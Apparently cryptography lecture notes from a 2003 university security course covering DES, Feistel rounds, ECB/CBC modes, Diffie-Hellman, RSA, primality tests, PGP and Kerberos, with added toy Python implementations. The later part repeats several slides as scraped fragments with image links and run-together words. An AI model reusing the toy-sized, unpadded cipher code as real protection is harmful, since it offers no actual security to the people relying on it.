DES was first proposed by IBM using 128-bit keys, but its security was reduced, with the involvement of NSA (the National Security Agency), to a 56-bit key.
At 1 ms per guess it would take about $10^{28}$ years to search a 128-bit key space ($2^{128} \approx 3.4 \times 10^{38}$ keys). For a 56-bit key ($2^{56} \approx 7.2 \times 10^{16}$ keys) the same rate gives about two million years, but a billion guesses a second brings that down to about two years.
The DES Standard gave a business level of safety, and is a product cipher.
DES - Data Encryption Standard
The (shared) 56-bit key is used to generate 16 subkeys of 48 bits, one per round; each round is a sequence of key mixing, S-box and P-box stages.
DES works on 64-bit messages called blocks.
If you intercept the key, you can decode the message.
However, there are about $10^{17}$ keys ($2^{56}$).
Feistel
Figure: a three-round Feistel network. The block is split into halves $l_0, r_0$; each round computes $l_{i+1} = r_i$ and $r_{i+1} = l_i \oplus f(r_i, K_i)$ with subkeys $K_0, K_1, K_2$, giving $l_3, r_3$. Decryption runs the same rounds with the subkeys in reverse order ($K_2, K_1, K_0$) and recovers $l_0, r_0$, whatever the function f is.
Each of the 16 stages (rounds) of DES uses a Feistel structure which encrypts a 64-bit value into another 64-bit value using a 48-bit key derived from the original 56-bit key.
DES modes of operation
The US government specifically recommends not using the weakest and simplest mode for messages, the Electronic Codebook (ECB) mode, in which each 64-bit block is enciphered independently: identical plaintext blocks produce identical ciphertext blocks, so patterns in the message show through.
They recommend the stronger and more complex Cipher Feedback (CFB) or Cipher Block Chaining (CBC) modes.
The CBC mode XORs each 64-bit plaintext block with the previous 64-bit ciphertext block (an initial vector for the first block) before encrypting it, so repeated plaintext no longer gives repeated ciphertext, and is more difficult to attack.
DES modes of operation
Figure: Electronic Code Book (each msg block goes straight through DES to its Ctext block) and Cipher Block Chaining (each msg block is XORed with the previous Ctext block, or with the initial vector for the first block, before going through DES).
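An added example, not from the notes and not DES itself: a toy 16-bit Feistel cipher (4 rounds, 8-bit subkeys, an arbitrary 4-bit S-box and a bit rotation as the P-box, all choices made up for this illustration) used to show that the Feistel structure inverts itself when the subkeys are reversed, and to compare ECB with CBC on a message made of identical blocks.

```python
# Added example (not from the lecture notes, and not DES): a toy Feistel cipher
# with 16-bit blocks, 4 rounds and 8-bit subkeys, showing (1) that the Feistel
# structure decrypts with the same rounds and the subkeys reversed, whatever the
# round function f is, and (2) why ECB leaks repeated blocks while CBC does not.
# The S-box, P-box and key schedule are arbitrary choices for this illustration;
# DES uses 64-bit blocks, 16 rounds and 48-bit subkeys.
ROUNDS = 4
BLOCK = 2  # bytes per block
SBOX = [0xE, 0x4, 0xD, 0x1, 0x2, 0xF, 0xB, 0x8, 0x3, 0xA, 0x6, 0xC, 0x5, 0x9, 0x0, 0x7]


def round_function(right, subkey):
    """f(R, K): key mixing, 4-bit S-box substitution, then a bit permutation (P-box).
    f need not be invertible; the Feistel network is invertible regardless."""
    x = (right ^ subkey) & 0xFF
    x = (SBOX[x >> 4] << 4) | SBOX[x & 0xF]
    return ((x << 3) | (x >> 5)) & 0xFF          # rotate left by 3 bits


def key_schedule(key16):
    """One 8-bit subkey per round, taken from successive rotations of the 16-bit key."""
    subkeys, k = [], key16 & 0xFFFF
    for _ in range(ROUNDS):
        k = ((k << 5) | (k >> 11)) & 0xFFFF
        subkeys.append(k & 0xFF)
    return subkeys


def feistel(block16, subkeys):
    """L_{i+1} = R_i,  R_{i+1} = L_i XOR f(R_i, K_i); the halves are swapped at the
    end so that the same routine with reversed subkeys is the inverse (the slide's diagram)."""
    left, right = block16 >> 8, block16 & 0xFF
    for k in subkeys:
        left, right = right, left ^ round_function(right, k)
    return (right << 8) | left


def _blocks(data):
    if len(data) % BLOCK:
        raise ValueError("message must be a multiple of the block size (pad it first)")
    return [int.from_bytes(data[i:i + BLOCK], "big") for i in range(0, len(data), BLOCK)]


def ecb(data, key16, decrypt=False):
    """Electronic codebook: every block enciphered on its own, so equal
    plaintext blocks give equal ciphertext blocks."""
    subkeys = key_schedule(key16)
    if decrypt:
        subkeys = subkeys[::-1]
    return b"".join(feistel(b, subkeys).to_bytes(BLOCK, "big") for b in _blocks(data))


def cbc_encrypt(data, key16, iv):
    """Cipher block chaining: XOR each plaintext block with the previous
    ciphertext block (the IV for the first one) before enciphering."""
    subkeys, prev, out = key_schedule(key16), iv, bytearray()
    for b in _blocks(data):
        prev = feistel(b ^ prev, subkeys)
        out += prev.to_bytes(BLOCK, "big")
    return bytes(out)


def cbc_decrypt(data, key16, iv):
    """Decipher each block, then XOR with the previous ciphertext block (or the IV)."""
    subkeys, prev, out = key_schedule(key16)[::-1], iv, bytearray()
    for c in _blocks(data):
        out += (feistel(c, subkeys) ^ prev).to_bytes(BLOCK, "big")
        prev = c
    return bytes(out)


def distinct_blocks(data):
    """How many different ciphertext blocks an eavesdropper gets to see."""
    return len(set(_blocks(data)))


if __name__ == "__main__":
    key, iv = 0xBEEF, 0x1234          # constructed key; IV must be fresh for every message
    msg = b"AAAAAAAAAAAAAAAA"         # eight identical plaintext blocks
    e, c = ecb(msg, key), cbc_encrypt(msg, key, iv)
    print("ECB distinct blocks:", distinct_blocks(e))   # 1: the repetition is visible
    print("CBC distinct blocks:", distinct_blocks(c))   # more than 1
    assert ecb(e, key, decrypt=True) == msg and cbc_decrypt(c, key, iv) == msg
```

The same chaining idea applies unchanged to real DES or AES: only the block size, round count and round function differ. Note that CBC hides repetition but provides no integrity; a modified ciphertext block still decrypts, just to garbage in that block and a one-block predictable change in the next.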
DES software
DES is available as a library on both UNIX and Microsoft-based systems. There is typically a des.h file, which must be included in any C source using the DES library:

```c
#include "des.h"
/*
 * - Your calls
 */
```
DES software
After initialization of the DES engine (expanding the key into its schedule of round subkeys), the library provides a function which can both encrypt and decrypt:

  int des_cbc_encrypt(clear, cipher, schedule, encrypt)

where the encrypt parameter determines if we are to encipher or decipher (the real library call also takes the data length and the initial vector for CBC mode).
The schedule is the key schedule derived from the secret DES key.
Case study: Amoeba capabilities
All Amoeba objects are identified by a capability string which is encrypted using DES encryption. A capability is long enough so that you can't just make them up.
If you have the string, you have whatever the capability allows you. If you want to give someone some access to a file, you can give them the capability string. They place this in their directory, and can see the file.
Case study: Amoeba capabilities
Figure: layout of a capability.

  Field        Size     Meaning
  Server port  48 bits  Identifies the server which manages the object
  Object ID    24 bits  Internal number which the server uses to identify the object
  Rights       8 bits   Identifies which operations are allowed
  Check field  48 bits  Protects against forging

To further prevent tampering, the capability is DES encrypted. The resultant bit stream may be used directly, or converted to and from an ASCII string with the a2c and c2a commands.
Public key systems
In 1976 Diffie and Hellman published the paper "New Directions in Cryptography", which first introduced the idea of public key cryptography.
Public key cryptography relies on the use of enciphering functions which are not realistically invertible unless you have a deciphering key.
For example, we have the discrete logarithm problem, in which it is relatively easy to calculate $n = g^k \bmod p$ given $g$, $k$ and $p$, but difficult to calculate $k$ in the same equation, given $g$, $n$ and $p$.
Diffie-Hellman key agreement
Two separated users create and share a secret key. A third party is not realistically able to calculate the shared key.
Figure: Alice (who knows p, g, a) sends $g^a \bmod p$ to Bob; Bob (who knows p, g, b) sends $g^b \bmod p$ to Alice; Ted, listening in, sees p, g, $g^a \bmod p$ and $g^b \bmod p$.
Knowledge different
• All participants know two system parameters p and g
• Alice and Bob each have a secret value (Alice has a and Bob has b)
• Alice and Bob each calculate and exchange a public key ($g^a \bmod p$ for Alice and $g^b \bmod p$ for Bob)
• Ted knows g, p, $g^a \bmod p$ and $g^b \bmod p$, but not a or b
Diffie-Hellman key agreement
Both Alice and Bob can now calculate the value $g^{ab} \bmod p$.
1. Alice calculates $(g^b \bmod p)^a \bmod p = (g^b)^a \bmod p$.
2. Bob calculates $(g^a \bmod p)^b \bmod p = (g^a)^b \bmod p$.
And of course $(g^b)^a \bmod p = (g^a)^b \bmod p = g^{ab} \bmod p$, which is the shared key.
Diffie-Hellman key agreement
Ted has a much more difficult problem. It is difficult to calculate $g^{ab} \bmod p$ without knowing either a or b. The algorithmic run-time of the (so far best) algorithm for doing this is in

$$O\left(e^{c\sqrt{r \log r}}\right)$$

where c is a small constant and r is the number of bits in the number: sub-exponential, but still far beyond polynomial.
Diffie-Hellman key agreement
By contrast, the enciphering and deciphering process (modular exponentiation) may be done in O(r) multiplications:

  Bit size   Enciphering   Discrete logarithm solution
  10         10            23
  100        100           1,386,282
  1,000      1,000         612,700,000,000,000,000,000,000
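Diffie-Hellman as an added example (not from the notes), with the toy parameters p = 23 and g = 5 chosen here so that Ted's brute-force discrete logarithm can actually be run; the secrets a = 6 and b = 15 are likewise made up for the demonstration.

```python
# Added example (not from the lecture notes): Diffie-Hellman key agreement with
# a toy prime small enough that the eavesdropper's discrete-logarithm search
# can be run and its cost counted.  p = 23, g = 5, a = 6, b = 15 are made up.
import secrets


def dh_public(p, g, secret):
    """Alice computes g^a mod p (Bob g^b mod p); this value is sent in the clear."""
    return pow(g, secret, p)


def dh_shared(p, peer_public, secret):
    """(g^b)^a mod p on Alice's side, (g^a)^b mod p on Bob's: both equal g^(ab) mod p."""
    return pow(peer_public, secret, p)


def brute_force_dlog(p, g, h):
    """Ted's problem: find k with g^k = h (mod p) by trying every exponent.
    Returns (k, steps).  steps grows like p, i.e. about 2^r for an r-bit prime,
    whereas each honest party's exponentiation costs O(r) multiplications."""
    x, steps = 1, 0
    for k in range(p - 1):
        if x == h:
            return k, steps
        x = (x * g) % p
        steps += 1
    raise ValueError("no solution: h is not a power of g modulo p")


def eavesdrop(p, g, alice_public, bob_public):
    """Ted sees p, g, g^a and g^b only.  With a small p he recovers a, then the key."""
    a, _ = brute_force_dlog(p, g, alice_public)
    return dh_shared(p, bob_public, a)


def run_exchange(p, g, a=None, b=None):
    """The full exchange; secrets are drawn at random when not supplied."""
    a = secrets.randbelow(p - 2) + 1 if a is None else a   # 1 <= a <= p-2
    b = secrets.randbelow(p - 2) + 1 if b is None else b
    A, B = dh_public(p, g, a), dh_public(p, g, b)          # exchanged in the clear
    key_alice, key_bob = dh_shared(p, B, a), dh_shared(p, A, b)
    assert key_alice == key_bob                            # (g^b)^a = (g^a)^b
    return A, B, key_alice


if __name__ == "__main__":
    p, g = 23, 5                      # toy prime; 5 generates the whole group mod 23
    A, B, key = run_exchange(p, g, a=6, b=15)
    print(f"Alice sends {A}, Bob sends {B}, shared key {key}")
    print("Ted recovers", eavesdrop(p, g, A, B), "by brute force")
    # With a 2048-bit p the same loop would need about 2^2048 steps: the honest
    # parties' cost is O(r), the attacker's (by this method) 2^r.
    # Caveat not on the slide: plain DH authenticates nobody; unless the public
    # values are signed, an active attacker can run one exchange with each side.
```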
Encryption
Figure: public key encryption. Plaintext P is enciphered with key K1 to give K1[P], which is deciphered with the matching key K2 to recover P. The two keys are inverses of each other: K1[K2[P]] = P and also K2[K1[P]] = P.
Authentication
Figure: authentication with two key pairs. The sender enciphers P first with its own secret key J2 and then with the receiver's public key K1, sending K1[J2[P]]; the receiver strips the outer layer with its secret key K2 and the inner layer with the sender's public key J1, recovering P. Only the holder of J2 could have produced the inner layer.
RSA (Rivest, Shamir, Adleman)
This public key system relies on the difficult problem of trying to find the complete factorization of a large composite [9] integer whose prime factors [10] are not known.
[9] An integer larger than 1 is called composite if it has at least one divisor other than 1 and itself.
[10] The Fundamental Theorem of Arithmetic states that any integer N greater than 1 may be expressed uniquely (up to the order of the factors) as a product of prime numbers.
RSA hacks
Two RSA-encrypted messages have been cracked:
• The inventors of RSA published a 129-digit (426-bit) RSA public key. In 1994, it was factored with 5000 MIPS-years of computing time.
• A year later, a 384-bit PGP key was cracked. It needed 1300 MIPS-years to factor the key in three months.
Note that these efforts each only cracked a single RSA key: the work has to be repeated for every other modulus.
RSA hacks
If you happen to be able to factor the following number, please tell Hugh - we can split US$200,000 [11]!
25195908475657893494027183240048398571429282126204032027777137836043662020707595556264018525880784406918290641249515082189298559149176184502808489120072844992687392807287776735971418347270261896375014971824691165077613379859095700097330459748808428401797429100642458691817195118746121515172654632282216869987549182422433637259085141865462043576798423387184774447920739934236584823824281198163815010674810451660377306056201619676256133844143603833904414952634432190114657544454178424020924616515723350778707749817125772467962926386356373289912154831438167899885040445364023527381951378636564391212010397122822120720357
[11] US$150,000 for me, US$50,000 for you...
RSA coding algorithms
Below are outlined the four processes needed for RSA encryption:
1. Creating a public key
2. Creating a secret key
3. Encrypting messages
4. Decoding messages
To create public key Kp
1. Select two different large primes P and Q.
2. Assign x = (P − 1)(Q − 1). (Does this ring a bell? It is Euler's totient φ(N) of the N defined below.)
3. Choose E relatively prime to x, i.e. gcd(E, x) = 1. (This must satisfy the condition for Ks given later.)
4. Assign N = P ∗ Q.
5. Kp is N concatenated with E.
To create private (secret) key Ks
1. Choose D such that $D \cdot E \bmod x = 1$.
   (a) i.e. D and E are multiplicative inverses modulo x (D is found with the extended Euclidean algorithm)
   (b) another way to say it: $DE = k(P − 1)(Q − 1) + 1$ for some integer k
2. Ks is N concatenated with D.
To encode plain text m
1. Pretend m is a number (smaller than N).
2. Calculate $c = m^E \bmod N$.
To decode c back to m
1. Calculate $m = c^D \bmod N$.
2. ....WHY?....
...Why?...

$$c^D \bmod N = m^{ED} \bmod N = m^{k(P-1)(Q-1)+1} \bmod PQ = m \cdot m^{k(P-1)(Q-1)} \bmod PQ$$

(using $ED = k(P-1)(Q-1) + 1$ from the construction of the private key)
• $m^{P-1} \bmod P = 1$ (Fermat's little theorem, for m not a multiple of P), so $(m^{P-1})^{k(Q-1)} \bmod P = 1$
• $m^{Q-1} \bmod Q = 1$ likewise, and so (tutorial: combine the two congruences with the Chinese remainder theorem) $(m^{P-1})^{k(Q-1)} \bmod PQ = 1$.
Hence $c^D \bmod N = m \cdot 1 \bmod N = m$.
(If m happens to be a multiple of P, both sides are 0 modulo P and the congruence modulo P holds trivially, so the conclusion is unchanged; the same goes for Q.)
RSA code
A complete RSA implementation in three lines of Perl (the big-number exponentiation is done by dc):

```perl
#!/usr/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)
```

and then

• echo "squeamish ossifrage" | ./rsa.perl -k=10001 -n=1967cb529 > msg.rsa
• ./rsa.perl -d -k=ac363601 -n=1967cb529 < msg.rsa

(-k is the exponent and -n the modulus, both in hexadecimal; decryption is the same exponentiation with the private exponent.)
Testing large numbers for primality
RSA requires us to generate large prime numbers, but there is no practical formula that directly produces arbitrarily large primes. Instead we pick random candidates and use statistical testing methods to determine primality.
Quiz! Is 162,259,276,829,213,363,391,578,010,288,127 prime [12]?
After choosing a large random (odd) number p, we can quickly see if p is divisible by 2, 3 and so on (say all primes up to 1000). If our number p passes this, then we can perform some sort of statistical primality test.
[12] Note that this is only a 33-digit number, and we typically use prime numbers with hundreds of digits.
Lehmann test
1. Choose a random number w (for witness) less than p.
2. If $w^{(p-1)/2} \not\equiv \pm 1 \pmod p$ then p is not prime.
3. If $w^{(p-1)/2} \equiv \pm 1 \pmod p$ then the likelihood is less than 0.5 that p is not prime.
Repeat the test over and over, say n times. The likelihood of a false positive will be less than $1/2^n$. Other tests, such as the Rabin-Miller test, may converge more quickly.
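The four RSA processes, the "why" check and the primality procedure (trial division by the primes up to 1000, then the Lehmann test) as one added Python example, not from the notes. The toy key P = 61, Q = 53, E = 17 and the 256-bit demonstration key are constructed for this example; the Lehmann routine also includes Lehmann's refinement, not stated on the slide, that a run of witnesses all giving +1 rejects the candidate.

```python
# Added example (not from the lecture notes): RSA key generation, encryption and
# decryption exactly as the slides describe them, with the primes produced by
# sieving and a Lehmann test.  The toy key (P = 61, Q = 53, E = 17) and the
# 256-bit key are constructed here; both are far too small for real use, where
# 2048 bits or more and a padding scheme such as OAEP are needed (textbook RSA
# as below is deterministic and malleable).
import random
from math import gcd

SMALL_PRIMES = [n for n in range(2, 1000) if all(n % d for d in range(2, int(n ** 0.5) + 1))]


def lehmann_is_probable_prime(p, rounds=40, rng=random):
    """Lehmann's test: for random witnesses w, w^((p-1)/2) must be +1 or -1 mod p.
    Any other value proves p composite; after `rounds` passes the chance that a
    composite slipped through is below 1/2^rounds.  Refinement from Lehmann's
    paper: a prime gives -1 for half of all witnesses, so a run of nothing but
    +1 is also treated as composite."""
    if p < 2:
        return False
    if p in (2, 3):
        return True
    if p % 2 == 0:
        return False
    saw_minus_one = False
    for _ in range(rounds):
        w = rng.randrange(2, p - 1)
        r = pow(w, (p - 1) // 2, p)
        if r == p - 1:
            saw_minus_one = True
        elif r != 1:
            return False
    return saw_minus_one


def generate_prime(bits, rng=random):
    """Random odd `bits`-bit candidate; reject by trial division, then by Lehmann."""
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if any(cand % q == 0 for q in SMALL_PRIMES if q < cand):
            continue
        if lehmann_is_probable_prime(cand, rng=rng):
            return cand


def rsa_private_exponent(E, x):
    """D with D*E = 1 (mod x), i.e. D*E = k*(P-1)*(Q-1) + 1 for some k."""
    return pow(E, -1, x)            # modular inverse (Python 3.8+)


def rsa_keygen(bits, rng=random, E=65537):
    """Steps 1-5 of the public-key slide and 1-2 of the private-key slide."""
    P = generate_prime(bits // 2, rng)
    Q = generate_prime(bits // 2, rng)
    while Q == P:
        Q = generate_prime(bits // 2, rng)
    x = (P - 1) * (Q - 1)           # Euler's phi(N)
    while gcd(E, x) != 1:           # E must be relatively prime to x
        E += 2
    N = P * Q
    return (N, E), (N, rsa_private_exponent(E, x))


def rsa_encrypt(m, public):
    N, E = public
    if not 0 <= m < N:
        raise ValueError("message must be a number smaller than N")
    return pow(m, E, N)             # c = m^E mod N


def rsa_decrypt(c, private):
    N, D = private
    return pow(c, D, N)             # m = c^D mod N


def check_why(P, Q, E, D, m):
    """The 'why' slide, numerically: ED = k(P-1)(Q-1) + 1, m^(P-1) = 1 mod P,
    m^(Q-1) = 1 mod Q, hence m^(k(P-1)(Q-1)) = 1 mod PQ (m coprime to P and Q)."""
    k, rem = divmod(E * D - 1, (P - 1) * (Q - 1))
    if rem:
        return False
    return (pow(m, P - 1, P) == 1 and pow(m, Q - 1, Q) == 1
            and pow(m, k * (P - 1) * (Q - 1), P * Q) == 1)


if __name__ == "__main__":
    D = rsa_private_exponent(17, 3120)         # toy key: N = 3233, x = 3120
    c = rsa_encrypt(65, (3233, 17))
    print(D, c, rsa_decrypt(c, (3233, D)), check_why(61, 53, 17, D, 65))
    # The quiz number from the notes is 2^107 - 1, a Mersenne prime:
    print(lehmann_is_probable_prime(162259276829213363391578010288127))
    public, private = rsa_keygen(256, random.Random(2003))
    m = int.from_bytes(b"squeamish ossifrage", "big")   # "pretend m is a number"
    assert rsa_decrypt(rsa_encrypt(m, public), private) == m
```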
Primes is in P!
A group at the Indian Institute of Technology Kanpur (Agrawal, Kayal and Saxena, 2002) have discovered the unexpected result that testing a number for primality can be done deterministically in polynomial time, rather than using probabilistic tests as just shown.
This is unlikely to affect the effectiveness of public key systems: primality testing was never the hard problem, factoring is.
The paper is only 7 pages long and is beautifully written...
Case study: PGP
PGP (Pretty Good Privacy) is a public key encryption package to protect E-mail and data files.
It lets you communicate securely with people you've never met, with no secure channels needed for prior exchange of keys.
PGP can be used to append digital signatures to messages, as well as encrypt the messages, or do both.
Case study: PGP
It uses various schemes including patented ones like IDEA and RSA.
The patent on IDEA allows non-commercial distribution, and the RSA patent has expired.
However there are also commercial versions of PGP.
PGP can use, for example, 2048-bit RSA keys, and it is considered unlikely that PGP with this level of encryption can be broken.
Chapter 8
Lecture 8 - Protocols
Mid semester Test
9th October 2003
LT27, 14:30
MCQ, closed book
Covers everything up to and including today...
Last session
• Finish on error correction
• Encryption
  – Symmetric keys: DES
  – Public keys: RSA
This session
• Kerberos
• Voting
• Contract signing
Summary
Substitution, Vigenère, index of coincidence
DES, Feistel, modes of operation
Public key, Diffie-Hellman, RSA
![Page 381: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/381.jpg)
Vigenère
If our keyword was BAD, then encoding HAD A FEED wouldresult in
Key B A D B A D B A
Text H A D A F E E D
Cipher I A G B F H F D
If we can discover the length of the repeated key (in thiscase 3), and the text is long enough, we can just considerthe cipher text to be a group of interleaved monoalphabeticsubstitution ciphers and solve accordingly.
CS3235 - Hugh Anderson’s notes. Page number: 380
![Page 382: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/382.jpg)
Analysis
The index of coincidence is the probability that two randomlychosen letters from the cipher will be the same, and it canhelp us discover the length of a key
IC =1
N(N − 1)
25∑
i=0
Fi(Fi − 1)
where Fi is the frequency of the occurences of symbol i andN is the length of the cipher.
CS3235 - Hugh Anderson’s notes. Page number: 381
![Page 383: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/383.jpg)
DES - Feistel
+ f
+ f
+ f
+ f
+ f
+ f
K2
K1
K0
K1
K0
K2
l0 r0
l0 r0
l1 r1
l2 r2
l3 r3
l3 r3
l2 r2
l1 r1
Each of the 16 stages (rounds) of DES uses a Feistel struc-ture which encrypts a 64 bit value into another 64 bit valueusing a 48 bit key derived from the original 56 bit key.
CS3235 - Hugh Anderson’s notes. Page number: 382
![Page 384: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/384.jpg)
DES modes of operation
DES
Ctext
msg
Electronic Code Book
DES
Ctext
msg
DES
Ctext
msg
Cipher Block Chaining
Initial vector
CS3235 - Hugh Anderson’s notes. Page number: 383
![Page 385: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/385.jpg)
Public key systems
Public key cryptography relies on the use of encipheringfunctions which are not realistically invertible unless youhave a deciphering key.
(Plaintext)XX
P
K1 (K1[K2[P]]=P)and also(K2[K1[P]]=P)
K1[P]
K2
P
CS3235 - Hugh Anderson’s notes. Page number: 384
![Page 386: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/386.jpg)
Authentication
[Figure: the sender enciphers P first with its own key J2 and then with the receiver's key K1, sending K1[J2[P]]. The receiver applies K2 and then J1 to recover P. Since only the sender holds J2, recovering a sensible P authenticates the sender as well as keeping the message private.]
Diffie-Hellman key agreement
Two separated users create and share a secret key. A third party is not realistically able to calculate the shared key.
[Figure: Alice holds p, g and her secret a; Bob holds p, g and his secret b. Alice sends g^a mod p to Bob and Bob sends g^b mod p to Alice. Each raises what it received to its own secret and both arrive at g^ab mod p. Ted, listening in, sees only p, g, g^a mod p and g^b mod p.]
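The exchange in the figure, as an added Python example (not from the course notes). p = 23 and g = 5 are constructed toy parameters, and Alice's and Bob's secrets 6 and 15 are constructed too. A function is included for Ted, who, seeing only p, g, g^a mod p and g^b mod p, has to solve a discrete logarithm; brute force manages it only because p is tiny.

```python
# Toy public parameters (constructed for this example; far too small for real use):
# p is prime and g generates the multiplicative group mod p.
P, G = 23, 5


def dh_public(secret, p=P, g=G):
    """What a party sends: g^secret mod p."""
    return pow(g, secret, p)


def dh_shared(their_public, my_secret, p=P):
    """What a party keeps: their_public^my_secret = g^(ab) mod p."""
    return pow(their_public, my_secret, p)


def key_agreement(a, b, p=P, g=G):
    """Alice (secret a) and Bob (secret b) exchange g^a and g^b and derive the same key.
    Returns the two messages Ted sees and the key he does not."""
    A, B = dh_public(a, p, g), dh_public(b, p, g)
    k_alice, k_bob = dh_shared(B, a, p), dh_shared(A, b, p)
    assert k_alice == k_bob
    return A, B, k_alice


def eavesdropper(A, B, p=P, g=G):
    """Ted's only route to the key: find a with g^a = A mod p, then compute B^a.
    Exhaustive search over 1..p-1 is feasible here only because p is tiny."""
    for a in range(1, p):
        if pow(g, a, p) == A:
            return a, pow(B, a, p)
    return None


def sanity_check_params(p, g):
    """Practitioner check on the public parameters: for prime p, g generates the whole
    group if g^((p-1)/q) != 1 for every prime factor q of p-1 (trial division suffices
    for toy sizes). A g of small order would leave the shared key in a small set."""
    n, m, f, factors = p - 1, p - 1, 2, set()
    while f * f <= m:
        while m % f == 0:
            factors.add(f)
            m //= f
        f += 1
    if m > 1:
        factors.add(m)
    return all(pow(g, n // q, p) != 1 for q in factors)


if __name__ == "__main__":
    A, B, k = key_agreement(6, 15)          # constructed secrets for Alice and Bob
    print(f"Alice sends {A}, Bob sends {B}, shared key {k}")
    print("Ted recovers (a, key):", eavesdropper(A, B))
```

With a 2048-bit prime the loop in eavesdropper never finishes, which is the whole security argument. Two caveats the figure does not show: check that g generates a large subgroup (sanity_check_params rejects g = 2 for p = 23, whose order is only 11), and note that the exchange authenticates nobody, so a Ted who sits in the middle and runs one exchange with Alice and another with Bob ends up sharing a key with each of them. In practice the values g^a and g^b are signed, or the exchange is run inside an authenticated protocol.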
RSA coding algorithms
The four processes needed for RSA encryption:
1. Creating a public key
2. Creating a secret key
3. Encrypting messages
4. Decrypting messages
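The four processes, as an added Python example (not from the course notes), with the constructed toy primes 61 and 53 and the constructed message 65. It also demonstrates the K1[K2[P]] = P and K2[K1[P]] = P property of the public-key slide, since the same modular exponentiation serves as encryption under one key and signing under the other, and it shows why the secret key stays secret: with a tiny n, trial division recovers the factors at once.

```python
import math


def make_keys(p, q, e=17):
    """Processes 1 and 2: public key (n, e) and secret key (n, d) with e*d = 1 mod phi(n).
    p and q are toy primes here; real keys use primes of 1024 bits and more."""
    n, phi = p * q, (p - 1) * (q - 1)
    assert math.gcd(e, phi) == 1, "e must be invertible mod phi(n)"
    d = pow(e, -1, phi)                 # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def encrypt(m, public):
    """Process 3: anyone holding the public key can do this."""
    n, e = public
    assert 0 <= m < n, "message must be an integer below n"
    return pow(m, e, n)


def decrypt(c, secret):
    """Process 4: only the holder of d can do this."""
    n, d = secret
    return pow(c, d, n)


def sign(m, secret):
    """The same operation with the keys swapped gives a signature..."""
    return decrypt(m, secret)


def verify(m, s, public):
    """...that anyone can check with the public key."""
    return encrypt(s, public) == m


def keys_commute(m, public, secret):
    """The property drawn on the public-key slide: K1[K2[P]] = P and K2[K1[P]] = P."""
    return decrypt(encrypt(m, public), secret) == m and verify(m, sign(m, secret), public)


def factor_by_trial_division(n):
    """Why the secret key stays secret: recovering d from (n, e) means finding phi(n),
    which means factoring n. This is instant only because n is tiny."""
    for p in range(2, math.isqrt(n) + 1):
        if n % p == 0:
            return p, n // p
    return None


# Constructed example values: primes 61 and 53 give n = 3233.
PUBLIC, SECRET = make_keys(61, 53)

if __name__ == "__main__":
    c = encrypt(65, PUBLIC)
    print("n, e, d =", PUBLIC[0], PUBLIC[1], SECRET[1], "ciphertext =", c, "decrypts to", decrypt(c, SECRET))
    print("factors of n by trial division:", factor_by_trial_division(PUBLIC[0]))
```

Textbook RSA as written here is deterministic and malleable: the same message always gives the same ciphertext, and ciphertexts multiply into valid ciphertexts of the product. Real systems pad (OAEP for encryption, PSS for signatures) and sign a hash of the message rather than the message itself.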
Uses of encryption
1. Generating encrypted passwords with 1-way functions
2. Checking integrity by appending digital signature
3. Checking the authenticity of a message.
4. Encrypting timestamps with messages to prevent replay attacks.
5. Exchanging a key.
Protocols
Systems in which the protocol plays a large part:
1. Kerberos protocol for distributing keys
2. Voting protocols
3. Contract signing protocols
These three protocols are by no means the only ones.
Other examples
Key distribution
Clipper
Oblivious transfer, in which a sender passes one of several pieces of information to a receiver without learning which one was taken; a building block for joint computations in which neither party reveals any unnecessary data.
Kerberos/Cerberus
Kerberos
Network authentication protocol.
Strong authentication for client/server applications using secret-key (symmetric) cryptography: every principal shares a long-term key with the Key Distribution Center.
Kerberos is freely available in source form.
Kerberos is also available in commercial products.
Client can prove its identity to a server (and vice versa) across an insecure network connection.
Kerberos
After a client and server have used Kerberos to prove their identity, they can also encrypt all of their communications to assure privacy and data integrity as they go about their business.
Must have a Key Distribution Center (KDC).
Kerberos is based on the Needham-Schroeder protocol.
Kerberos
[Figure: Client, KDC and Server. The KDC provides an Authentication service and a Ticket-granting service. Messages (1) and (2) pass between the client and the Authentication service, (3) and (4) between the client and the Ticket-granting service, and (5) and (6) between the client and the Server.]
Kerberos
When a client first authenticates to Kerberos, she:
1. Talks to KDC, to get a Ticket Granting Ticket
2. Uses that to talk to the Ticket Granting Service
3. Uses the ticket, to interact with the server.
This way a user doesn't have to reenter passwords every time they wish to connect to a Kerberized service. If the Ticket Granting Ticket is compromised, an attacker can only masquerade as the user until the ticket expires.
Kerberos protocol
Two sorts of credentials: tickets and authenticators .
A ticket Tc,s contains the client's name and network address, the server's name, a timestamp and a session key. This is encrypted with the server's secret key (so that the client is unable to modify it).
